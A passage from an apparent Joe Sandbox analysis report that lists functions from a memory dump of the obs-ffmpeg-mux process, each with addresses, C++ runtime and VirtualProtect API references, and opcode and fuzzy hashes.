                                                            • Instruction Fuzzy Hash: 68117F7260E685E6D660CB19E05026EB7A1F788798F400531E6CDA3B9ACF7DD505CF04
                                                            Function 00007FFDA37C51B0 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: 7865fec313e20a3979ba395959dce6b8e966b348efb85e3a31f2fd5e9caaeb80
                                                            • Instruction ID: a40f02a29a7f76844d52c2b662c1defb455f8cc71484c82939cea548065b2a32
                                                            • Opcode Fuzzy Hash: 7865fec313e20a3979ba395959dce6b8e966b348efb85e3a31f2fd5e9caaeb80
                                                            • Instruction Fuzzy Hash: 4C117FB260D68296D720DB5AE45026EB7E1F7C87A9F500131EACDA3B5ACF6ED504CF04
                                                            Function 00007FFDA37C5750 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: 7865fec313e20a3979ba395959dce6b8e966b348efb85e3a31f2fd5e9caaeb80
                                                            • Instruction ID: 30b285bc5fb10c4bf0a32dae4d47981ed78e7826cc914ea582e568961dbb9582
                                                            • Opcode Fuzzy Hash: 7865fec313e20a3979ba395959dce6b8e966b348efb85e3a31f2fd5e9caaeb80
                                                            • Instruction Fuzzy Hash: 97117F7260D681D6D720CB5AE05016EB7E1F7887A9F000535E6CC93B5ACF6ED544CF04
                                                            Function 00007FFDA37C2020 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: ff5675144e84ad65f93a5906dca93df837476c34ee4c48483d95704c76504fd0
                                                            • Instruction ID: e20c8a361f4b94d67a5856bc534d8481a0aef59bfc3689bf7804cfcaff65484b
                                                            • Opcode Fuzzy Hash: ff5675144e84ad65f93a5906dca93df837476c34ee4c48483d95704c76504fd0
                                                            • Instruction Fuzzy Hash: 78117F7260D68596DA20DB19F05027EB7A1F789798F000532EACD93BAACF6DD944CF08
                                                            Function 00007FFDA37C9C60 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::_std::_
                                                            • String ID:
                                                            • API String ID: 1114552684-0
                                                            • Opcode ID: 7afdc86497907c7a25c31215e41606b93e818883ea4be03793ea73c605ceefd4
                                                            • Instruction ID: c78d72abd37409ae0a8854bc1a7649dcdf9a13ee2b6acdbdf7b461430b757f43
                                                            • Opcode Fuzzy Hash: 7afdc86497907c7a25c31215e41606b93e818883ea4be03793ea73c605ceefd4
                                                            • Instruction Fuzzy Hash: C4117F7260D68296D670CB19E06016EB7E1FB89798F400531E6CDA3B5ACF6ED544CF04
                                                            Function 00007FFDA3800120 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FFDA37FF345,?,?,?,?,?,00007FFDA37FEE27), ref: 00007FFDA38001B0
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 1b2a54a21af61ff9d338260242aaa81a91328837a4295b8b75207e78f052b79a
                                                            • Instruction ID: 653d5de53bf222c14cfdbb5d70122a40360831b6ea03abf2c42316dbdca1a146
                                                            • Opcode Fuzzy Hash: 1b2a54a21af61ff9d338260242aaa81a91328837a4295b8b75207e78f052b79a
                                                            • Instruction Fuzzy Hash: 6211EC32719B8482DB50DB5AF4A112EB7A2FBC9BC4F504525FB8E83B1ADE3DD0508B44
                                                            Function 00007FFDA38001D0 Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FFDA37FF395,?,?,?,?,?,00007FFDA37FEFA7), ref: 00007FFDA380025D
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 757c0db0e2298c6b681ec3fb8250b093f7271d4564226f7c41c8b54b819850f3
                                                            • Instruction ID: 9ad638024fa6e9713309de879f2e23b394efcfc0d0a26ed6ad7de53400ce64d4
                                                            • Opcode Fuzzy Hash: 757c0db0e2298c6b681ec3fb8250b093f7271d4564226f7c41c8b54b819850f3
                                                            • Instruction Fuzzy Hash: E211EC32719B8482DB40DB5AF4A012EB7A2FBC5BC4F504525EB8E83B1ADE3DD0508B44
                                                            Function 00007FFDA37B63F0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B640D
                                                              • Part of subcall function 00007FFDA37C3FC0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C3FEA
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 41aeea17553626d6c14e59520508c4e0868b0cdd80a2e57f83201158ff7482dd
                                                            • Instruction ID: 6da983e2b9636e17f1e64bb77d2020410c54a3c4dc61c4142b852b03b66619c9
                                                            • Opcode Fuzzy Hash: 41aeea17553626d6c14e59520508c4e0868b0cdd80a2e57f83201158ff7482dd
                                                            • Instruction Fuzzy Hash: 1AF03A32A1DB8186D620EB24F45005FBBA1F7D4380F004625F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37BE640 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BE65D
                                                              • Part of subcall function 00007FFDA37C9C60: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C9C8A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 239b0f5903f283f04cd118ec9208860d53e63feb00ea83fa3b87e731cd5eb6ed
                                                            • Instruction ID: be05c78b8f4c5ac9a9cfc501f9ad815acd0cf7bab9c5d9b113ac4f5f2a3f8c3f
                                                            • Opcode Fuzzy Hash: 239b0f5903f283f04cd118ec9208860d53e63feb00ea83fa3b87e731cd5eb6ed
                                                            • Instruction Fuzzy Hash: 61F03A72A1D78086D620DB24F45005FBBA1F7D5780F404225F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37BA540 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BA55D
                                                              • Part of subcall function 00007FFDA37C6E40: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C6E6A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 2bbc96903360294c09d5d14d26b68e736cc7121a532422e75f772084ae43cf7b
                                                            • Instruction ID: f4131d5b5663142f76cba443ab8c0fc5c1d1de6d51f3d060c02a1e2bcdbca1f2
                                                            • Opcode Fuzzy Hash: 2bbc96903360294c09d5d14d26b68e736cc7121a532422e75f772084ae43cf7b
                                                            • Instruction Fuzzy Hash: 12F0DA72A1D78196D620EB24E45145FBBA2FBD8780F504225F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37B6C10 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B6C2D
                                                              • Part of subcall function 00007FFDA37C4670: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C469A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: fd194588803682c8b35a164ba329f2c5f9a448e601a6379e4138ab21443ebc00
                                                            • Instruction ID: 154df1f68aa5382c657e2f88596b1a3ec88ed5de5c932ff03f7b6faeee8fe637
                                                            • Opcode Fuzzy Hash: fd194588803682c8b35a164ba329f2c5f9a448e601a6379e4138ab21443ebc00
                                                            • Instruction Fuzzy Hash: 12F03A32A1DB8196C620EB24F45105FBBA1F7D8380F004225F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37BEE60 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BEE7D
                                                              • Part of subcall function 00007FFDA37CA210: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37CA23A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 7f4a9846ea8a7311de4a681a7c5ebc287606d59b4abb87cdfecebcad7ee30aa3
                                                            • Instruction ID: 0ab75e855144f170e73203b6cb7c9c21f472de59941e163b1a86b7a5d1b7946f
                                                            • Opcode Fuzzy Hash: 7f4a9846ea8a7311de4a681a7c5ebc287606d59b4abb87cdfecebcad7ee30aa3
                                                            • Instruction Fuzzy Hash: 7AF03A32A1D78186D620DB24F45005FBBA1F7D4380F404225F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37BAD60 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BAD7D
                                                              • Part of subcall function 00007FFDA37C73F0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C741A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 3cfb87811e0e8426699efa594c4026a0922f6eeb9a3d5e931bf17600966f1444
                                                            • Instruction ID: 1aab703f4fbc56bbc36a778481b237a7a31108e614ec804a5fdeb09145d42ad1
                                                            • Opcode Fuzzy Hash: 3cfb87811e0e8426699efa594c4026a0922f6eeb9a3d5e931bf17600966f1444
                                                            • Instruction Fuzzy Hash: 2CF03A32A1D7C186C620EB24E45005FBBA1F7D8380F404225F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37B7C50 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B7C6D
                                                              • Part of subcall function 00007FFDA37C51B0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C51DA
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 69f004aa889c9b2b0fd0a1e29e2095f98294a0f1e7ede99ee7932246fef2907e
                                                            • Instruction ID: 57fca838c33817d77ea3a6cc4284c907d08f8eff75d3d0f554db4b03e7ac8647
                                                            • Opcode Fuzzy Hash: 69f004aa889c9b2b0fd0a1e29e2095f98294a0f1e7ede99ee7932246fef2907e
                                                            • Instruction Fuzzy Hash: 83F03A72A1D78086C620DB24E85005FBBA1FBD4380F404229F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37B39D0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37B39ED
                                                              • Part of subcall function 00007FFDA37C2020: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C204A
                                                              • Part of subcall function 00007FFDA3781740: __std_exception_destroy.LIBVCRUNTIME ref: 00007FFDA3781764
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fac_nodeFac_node::___std_exception_destroystd::_std::exception::exception
                                                            • String ID:
                                                            • API String ID: 334543182-0
                                                            • Opcode ID: 1e83dd43e9ce261b1651649e702639c55bda9e576511c4798ff5834a448328a8
                                                            • Instruction ID: 3420e519d23a03035011fa9f34f635483d9b19c40fd17a24cedb28ccd832df36
                                                            • Opcode Fuzzy Hash: 1e83dd43e9ce261b1651649e702639c55bda9e576511c4798ff5834a448328a8
                                                            • Instruction Fuzzy Hash: 97F03A32A1D78086D620EB24F45005FBBA2F7D4380F104225F6CE42B6ADF2CD6508F44
                                                            Function 00007FFDA37BC5C0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • std::exception::exception.LIBCONCRTD ref: 00007FFDA37BC5DD
                                                              • Part of subcall function 00007FFDA37C85E0: std::_Fac_node::_Fac_node.LIBCPMTD ref: 00007FFDA37C860A
